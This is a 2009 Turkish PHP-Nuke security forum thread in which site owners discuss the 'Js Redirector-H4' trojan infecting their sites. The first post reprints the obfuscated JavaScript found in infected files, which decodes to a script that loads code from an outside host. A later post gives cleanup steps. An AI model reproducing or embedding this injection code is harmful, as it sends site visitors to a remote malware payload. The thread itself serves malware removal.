Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 726
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4993 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(8258 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3479 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(10206 okuma, 10 yanıt)
 Nuke Sentinel..
(4583 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5122 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3585 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10568 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9677 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5385 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(42593 okuma, 45 yanıt)
 Bu bir saldırmı..
(8541 okuma, 7 yanıt)
 siteme virüs girmis..
(8616 okuma, 6 yanıt)
 Sitedekileri atmak..
(5472 okuma, 2 yanıt)
 Kötü botları engellemek...
(11641 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7428 okuma, 5 yanıt)
 index atılamayan site yap..
(7358 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5554 okuma, 2 yanıt)
 js trojandownloader.agent..
(5953 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7798 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5184 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6192 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(14501 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(27637 okuma, 25 yanıt)
 hacklendim mi?..
(6275 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(79661 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4636 okuma, 1 yanıt)
 Site neden Google i banla..
(4352 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6485 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7594 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7627 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(10303 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7324 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5170 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4919 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5494 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4997 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3583 okuma, 0 yanıt)
 Protector' deki Host İs..
(3603 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7876 okuma, 7 yanıt)
 index dosyasının chmod k..
(4225 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3779 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(8214 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4664 okuma, 1 yanıt)
 Nuke Güvenlik..
(165736 okuma, 257 yanıt)
 bütün index lere iframe e..
(19686 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5923 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(25572 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(19865 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3952 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Js Redirector-H4 / Trojen
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Js Redirector-H4 / Trojen

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
AndersNystrom
Mesaj: 200+
Mesaj: 200+





Kayıt: Dec 06, 2005
Mesajlar: 231

MesajTarih: 2009-05-14, 14:57:55    Mesaj konusu: Js Redirector-H4 / Trojen Alıntıyla Cevap Gönder

Gecenlerde bir kaç Avast kullanıcısından aldığım uyarıyla dosyaları inceledim.
Js dosyalarında farklı kodlar gördüm. Veritabanında ki tüm dosyaları tek tek arattırdım ve tüm yeni kodları sildim. Bakmadığım dosya kalmadı. Çoğu avast kullanıcısında artık uyarı vermiyormuş ama bazılarında hala veriyor ve sitemin kaynak kodunda dosyalarda bulduğum kod hala duruyor. Bu kodu hiç bir dosya içerisinde bulamadım.
Kod şu şekilde:

Kod:
function(){var wQRT='va.72.20a.3d.22Scri.70tEn.67.69n.65.22.2cb.3d.22Ver.73.69on()+.22.2cj.3d.22.22.2cu.3d.6ea.76igator.2euserAg.65nt.3bi.66((.75.2e.69.6e.64exO.66.28.22Win.22).3e0).26.26(u.2e.69n.64exOf(.22.4eT.206.22.29.3c.30).26.26.28.64.6fcume.6et.2ecook.69.65.2eindexO.66(.22miek.3d1.22).3c0).26.26(typeo.66(.7a.72vzts.29.21.3dtypeof(.22.41.22))).7bzrvzts.3d.22.41.22.3b.65val(.22if(window.2e.22+.61+.22.29j.3dj+.22+a.2b.22.4dajo.72.22+b+a+.22Mi.6e.6fr.22+b+.61+.22Build.22.2bb.2b.22j.3b.22).3bdocu.6d.65nt.2ewr.69.74e.28.22.3cscr.69.70.74.20src.3d.2f.2fgumb.6car.2e.63.6e.2f.72s.73.2f.3fi.64.3d.22+.6a+.22.3e.3c.5c.2fscript.3e.22).3b.7d';var W4z=wQRT.replace(/./g,'%');var dHFP=unescape(W4z);e v a l(dHFP)})();


Acaba kendini nereye enjekte etmiş olabilir

Web site aderim:
www.karakatliam.com
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-22, 02:57:38    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Carrot
Mesaj: 200+
Mesaj: 200+





Kayıt: Aug 10, 2008
Mesajlar: 290

MesajTarih: 2009-05-14, 15:23:07    Mesaj konusu: Alıntıyla Cevap Gönder

Bilmiyorum mümkün mü ama sql'da olabilir mi ?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
AndersNystrom
Mesaj: 200+
Mesaj: 200+





Kayıt: Dec 06, 2005
Mesajlar: 231

MesajTarih: 2009-05-14, 15:30:02    Mesaj konusu: Alıntıyla Cevap Gönder

İlk sql u kontrol ettim :)
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
AndersNystrom
Mesaj: 200+
Mesaj: 200+





Kayıt: Dec 06, 2005
Mesajlar: 231

MesajTarih: 2009-05-14, 16:26:57    Mesaj konusu: Alıntıyla Cevap Gönder

Sorunu çözdüm. Bu trojenle uğraşan arkadşlar varsa ayrıntılı yazarım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
hamzot
Mesaj: 500+
Mesaj: 500+





Kayıt: Jan 02, 2009
Mesajlar: 970
Konum: Yaylasaray

MesajTarih: 2009-05-15, 02:16:50    Mesaj konusu: troj Alıntıyla Cevap Gönder

sorunu çözmen sevindirici kardeş genede sen anlat burada bilgilensin millet paylaşım adına güzel olur bence ..kolay gelsin..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
fEth
Mesaj: 100+
Mesaj: 100+





Kayıt: Jun 14, 2006
Mesajlar: 190
Konum: weStanbuL

MesajTarih: 2009-05-15, 02:32:43    Mesaj konusu: Alıntıyla Cevap Gönder

Anlat kardeşim.
benim siteme de ve aynı ftp den girdiğim için doğal olarak diğer siteme de virüs mü trojen mi herneyse bi sekilde girdi ve ben sildikce kendini yeniliyor.

index.php nin hemen yanına geliyor ve hiç dokunmazsam zamanla o kod uzuyor da büyüyor.images klasörlerinin içerisine image.php atıyor.
Bunlar olduktan site ve içerisindeki tüm modullere aynı geçiyor ve sitenin yavaslamasına google nin siteyi saf dısı bırakmasına neden oluyor.

Bunun yüzünden Sandbox'a mı düştüm bilemiyorum.Bu düşüncemin sebebi Google' da ileride oldugum tüm kelimeler kalkmış durumda.Günlük %80 oranında hit kaybetmeme sebep oLdu.
inşallah buluruz bi çaresini.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
denizcan
Mesaj: 100+
Mesaj: 100+





Kayıt: Jun 14, 2004
Mesajlar: 192
Konum: istanbul

MesajTarih: 2009-05-15, 09:31:24    Mesaj konusu: Alıntıyla Cevap Gönder

Bende Aynı Sorun Var Kodlar sitenin kaynağını görüntüle denince gözüküyor.Yalnız index.php içerisinde kodlar gözükmüyor
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
AndersNystrom
Mesaj: 200+
Mesaj: 200+





Kayıt: Dec 06, 2005
Mesajlar: 231

MesajTarih: 2009-05-15, 13:48:46    Mesaj konusu: Alıntıyla Cevap Gönder

O zaman ben nasıl kutrulduğumu anlatayım, sizde ona göre yaparsınız. Ama bana bulaşan Js Redirector-H4 trojeniydi.

Tüm FTP'yi indiriniz. Öncelikle bilgisayarınıza Kaspersky yada kendi tercih ettiğiniz bir antivirüs varsa kurunuz. Güncellemeleri yapınız. Ardından Combofix yükleyiniz.
Combofix'i buradan yüklüyebilirsiniz:

http://www.gezginler.net/modules/mydownloads/singlefile.php?download=combofix&lid=7011

Antivirüsünüzü kapatın ve Combofix i masaüstüne atıp çalıştırın. Çıkan uyarıların hepsine evet diyerek ilerleyin. Combofix taraması bittikten sonra Dracula Virüs temizleyicisini çalıştırınız. Onu da buradan indirebilirsiniz:

http://www.gezginler.net/modules/mydownloads/singlefile.php?download=dracula-virus-temizleyici&lid=5206

Bu işlemler bittikten sonra antivirüsünüzü tekrar aktif edin ve tam tarama yapın.

Virüs tarama işlemleri bittikten sonra kurmamız gereken bir program daha var o da : Editplus kod düzenleyicisi. Kendi adreslerinden edinebilirsiniz: http://www.editplus.com/

Öncelikle inculudes içindeki ".js" uzantılı dosyaların kodlarına bakınız. Js uzantılı dosyanıza bulaşışsa bu kod en altta java script olarak gözükecektir. Mesela bu kod
Kod:
function(){var wQRT
olarak gidiyorsa "function(){var wQRT" kısmını kopyalayın. Editplus programını acarak "Searc - Find In Files" sekmesini tıklayın.
Find what kısmına function(){var wQRT yapıştırın.
File tip kısmına *.* yazınız.
Folder seceneğinden indirmiş olduğunuz FTP dosyasını seciniz(puplic_html)
Alttaki seceneklerden Include Subfolders ı tıklayıp aratmaya başlayın.

Kendini enjekte ettiği tüm dosyaları göreceksiniz. Hangi dosyalarda olduğunu buldukdan sonra o dosyaları tek tek düzenleyip kodları siliniz.

Keşke iş bu kadar basit olsa. Bu bana bulaşan virüs öyle illet bişeydi ki kendini her dosyada farklı bir şekilde kodlamış. Diğer js leri de kontrol edip eğer kendini farklı bir şekilde kodlamışsa onlaıda aratıp bulup siliyoruz.

Js dosyalarında kendini en alta kodluyor. Tüm Jslerle işimiz bittikten sonra Html dosyalarına da göz atın. Ama Js ye yerleşen kodla aynı olduğu için zaten o da aramada çıkıyor.

Şimdi gelelim .php dosyalarına. Bulaşan kodu bulmanın en kolay yolu modules klasöründe ki modullerin index.php sini kontrol etmektir. Eğer ilk satırda ki <?php den sonra herhangi bir kod varsa bu kodu kopyalayın ve tüm dosyalarda aratın. ve <?php satırındaki tüm kodları siliniz.

Tüm kodları temizledikten sonra FTP şifrenizi değiştirin ve temizlediğiniz dosyaları FTP ye gönderiniz.

Ben bu anlattığım şekilde kurtuldum. Umarım sizinde işinize yarar
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-22, 02:57:38    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Sitemde trojen var AsAr Php Nuke Güvenlik 5 2008-12-04, 17:27:03 Son Mesajı Görüntüle
Yeni mesaj yok Java Trojen okii3 HTML - JavaScripts 0 2008-05-20, 22:41:53 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright